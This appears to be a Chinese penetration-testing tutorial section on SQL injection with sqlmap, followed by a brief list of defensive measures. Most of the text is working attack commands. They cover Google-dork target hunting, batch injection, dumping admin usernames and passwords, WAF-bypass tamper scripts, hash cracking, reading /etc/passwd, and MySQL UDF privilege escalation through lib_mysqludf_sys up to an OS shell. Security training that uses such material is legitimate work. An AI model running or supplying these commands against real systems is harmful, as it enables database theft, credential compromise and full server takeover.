2.4.4 检测和利用SQL注入
1.手工判断是否存在漏洞
针对可能存在SQL注入漏洞的URL添加+AND+1=1 和 +AND+1=2 看返回的结果是否一致,如果不一致那么就存在SQL注入
2.sqlmap自动检测
实际测试使用sqlmap的过程中会一直提示你应答,有交互的过程,可以通过参数--batch 来完成自动应答的效果
3.寻找和判断实例
可以通过百度或者谷歌使用相关语法进行搜索,这里不做具体细节演示,可以搜索Google Hack语法
4.批量检测
可以将收集到可能存在SQL注意漏洞的URL放在一个文本文件中,例如:将所有的URL地址保存 bmfx.txt ,然后使用sqlmap.py -m bmfx.txt 即可开始进行批量注入探测,注意bmfx.txt文件需要和sqlmap在同一个目录下,否则sqlmap找不到对应的文件
2.4.5 直接连接数据库
sqlmap直接连接数据库的命令如下:
sqlmap.py -d "mysql://root:root@192.168.91.130:3306/dvwa" -f --banner --dbs --users
2.4.6 数据库相关操作
1.列数据库信息:--dbs
2.目标站点当前Web所使用的数据库:--current-db
3.目标站点当前Web所使用数据库的账户:--current-user
4.列出目标站点数据库的所有用户:--users
5.列出目标站点数据库的密码:--passwords
6.指定库名列出所有表:-D database --tables
参数说明:
-D 指定数据库名称
7.指定库名表名列出所有字段:-D bmfx_com -T root --columns
参数说明:
-T 指定要列出字段的表
8.指定库名表名字段dump出指定字段:
-D bmfx_com -T admin -C id,username,password --dump
-D bmfx_com -T admin -C "id,username,password" --dump
上面可以加双引号,也可以不加双引号
9.导出多少条数据:
-D bmfx_com -T admin -C id,username,password --start 1 --stop 10 --dump
参数说明:
--start 指定开始的行
--stop 指定结束的行
上述含义就是导出id,username,password 的1-10行的数据内容
2.4.7 sqlmap使用技巧
1.MySQL的注释方法绕过WAF进行SQL注入
(1) 使用sqlmap进行注入测试:
sqlmap.py -u "http://192.168.91.130/dvwa/vuln.php?id=3" --tamper "halfversionedmorekeywords.py"
(2) 其他绕过WAF脚本的方法
sqlmap.py -u "http://192.168.91.130/dvwa/vuln.php?id=3" --tamper tamper/between.py, tamper/randomcase.py -v 3
(4) tamper目录下文件的具体含义:
space2comment 空格替换为/**/
apostrophemask 单引号替换为UTF-8字符
equaltolike 等号替换为like
space2dash 空格替换为–加随机字符 ; 绕过过滤‘=‘ 替换空格字符(‘ ‘) , (‘-‘) 跟一个破折号注释,一个随机字符串和一个新行(‘n‘)
greatest 大于号替换为greatest;绕过过滤‘>‘,用GREATEST替换大于号
space2hash 空格替换为#加随机字符; 空格替换为#,随机字符串及换行符
apostrophenullencode 替换双引号为%00%27;绕过过滤双引号,替换字符和双引号
halfversionedmorekeywords 在每个关键字前加注释
space2morehash 空格替换为#加更多的随机字符及换行符
appendnullbyte 在有效载荷结束位置加载零字节字符编码 例如:%00
ifnull2ifisnull 绕过对IFNULL过滤,替换类似IFNULL(A,B)为IF(ISNULL(A),B,A)
space2mssqlblank 空格替换为其他空符号 ; 替换空格
modsecurityversioned 过滤空格,包含完整的查询版本的注释
base64encode 使用base64编码替换
space2mssqlhash 空格替换为%23%0A
space2mysqldash 替换空格字符(‘‘),(‘-‘) 后跟一个破折号注释一个新行(‘n‘)
space2mysqlblank 空格替换为其他空白符号(Mysql)
between 比较符替换为between ; 用between替换大于号(>)
multiplespaces 围绕SQL关键字添加多个空格
space2plus 空格替换为加号 ; 用+替换空格
bluecoat 代替空格字符后与一个有效的随机空白字符的SQL语句,等号替换为like
nonrecursivereplacement 双重查询语句取代SQL关键字;替换预定义关键字
space2randomblank 代理空格字符(""),从空白字符集中选择&09,%0A,%0C,%0D 来替代空白符
sp_password 追加sp_password,从DBMS日志的自动模糊处理的有效载荷的末尾
chardoubleencode 双url编码(不处理已编码的)
unionalltounion union all select替换为union select
charencode URL编码
randomcase 字符大小写随机替换;随机大小写
unmagicquotes 宽字符绕过GPC addslashes
randomcomments 使用/**/分割SQL关键字
charunicodeencode 字符串unicode编码
securesphere 追加特制的字符串
versionedmorekeywords 使用注释绕过
2.URL重写SQL注入测试
value1 为测试参数,加"*" 即可,sqlmap将会测试value1的位置是否存在注入
sqlmap.py -u "http://targeturl/paraml/value1*/param2/value2"
3.列举并破解密码哈希值
当前用户有权限读取包含用户密码的权限时,sqlmap会先列举出用户,然后列出Hash,并尝试破解
sqlmap.py -u "http://192.168.91.130/sqlmap/mysql/get_int.php?id=3" --passwords -v 1
4.获取表中的数据个数
代码如下:
sqlmap.py -u "http://192.168.91.130/sqlmap/mysql/get_int.php?id=3" --count -D bmfxdb
5.对网站xxx.com进行漏洞爬取
代码如下:
sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --batch --crawl=3
6.基于布尔SQL注入预估时间
代码如下:
sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --b --eta
7.使用hex避免字符编码导致数据丢失
代码如下:
sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --banner --hex -v 3 --parse-errors
8.模拟测试手机环境站点
代码如下:
sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --mobile
9.智能判断测试
代码如下:
sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --batch --smart
10.结合burpsuite进行注入
代码如下:
通过burpsuite抓包,需要设置burpsuite记录请求日志
sqlmap.py -r burpsuite.txt
指定表单注入:
sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --data "username=root&password=root"
11.sqlmap自动填写表单注入
sqlmap.py -u URL --forms
sqlmap.py -u URL --forms --dbs
sqlmap.py -u URL --forms --current-db
sqlmap.py -u URL --forms -D 数据库名 --tables
sqlmap.py -u URL --forms -D 数据库名 -T 表名 --columns
sqlmap.py -u URL --forms -D 数据库名 -T 表名 -C username,password --dump
12.读取Linux下的文件
代码如下:
sqlmap.py -u URL --file /etc/passwd
13.延时注入
代码如下:
sqlmap.py -u URL --technique -T --current-user
14.sqlmap结合Burpsuite进行post注入
结合Burpsuite来使用sqlmap
使用Burpsuite一个POST登录的请求数据包,然后保存为bmfx.txt ,并保存在sqlmap目录下面,运行如下命令
sqlmap.py -r bmfx.txt -p tfUPass
15.sqlmap Cookies注入
代码如下:
sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --dbs --level 2
默认情况下sqlmap只支持get/post参数的注入测试,但是如果使用--level 设置其参数数值大于等于2的时候,sqlmap就会去检查Cookie中的参数,当大于等于3的时候就会去检查User-Agent和Referer,可以通过Burpsuite获取Cookie值,然后开始注入:
sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3
sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3--dbs
sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3 --current-db
sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3 -D 数据库名 --tables
sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3 -D 数据库名 -T 表名 --columns
sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3 -D 数据库名 -T 表名 -C username,password --dump
16.Mysql提权
(1) 连接Mysql数据打开一个交互shell:
sqlmap.py -d mysql://root:root@127.0.0.1:3306/bmfx --sql-shell
select @@version;
select @@plugin_dir;
D:\\phpstudypro\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\
(2) 利用slqmap上传lib_mysqludf_sys到Mysql插件目录
sqlmap.py -d mysql://root:root@127.0.0.1:3306/bmfx --file-write=D:/tmp/lib_mysqludf_sys.dll --file-dest=D:\\phpstudypro\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\lib_mysqludf_sys.dll
CREATE FUNCTION sys_exec RETURNS STRING SONAME ‘lib_mysqludf_sys.dll‘
CREATE FUNCTION sys_eval RETURNS STRING SONAME ‘lib_mysqludf_sys.dll‘
select sys_eval(‘ver‘);
17.执行shell命令
代码如下:
sqlmap.py -u URL --os-cmd="net user" 执行net user命令
sqlmap.py -u URL --os-shell 系统交互式shell
18.延时注入
代码如下:
sqlmap.py -u URL --delay 0.5 延时0.5秒
sqlmap.py -u URL --safe-freq 请求2次
2.4.8 安全防范
利用sqlmap进行的所有攻击都是因为存在安全漏洞,因此建议的安全防范防范如下:
(1) 对源代码进行安全代码审计,对存在安全漏洞的代码进行修补
(2) 在网站部署云安全防护,如云盾,安全狗等各种安全防护软件
(3) 定期查看网站安全日志,分析主要访问来源,对涉及可能攻击的页面进行检查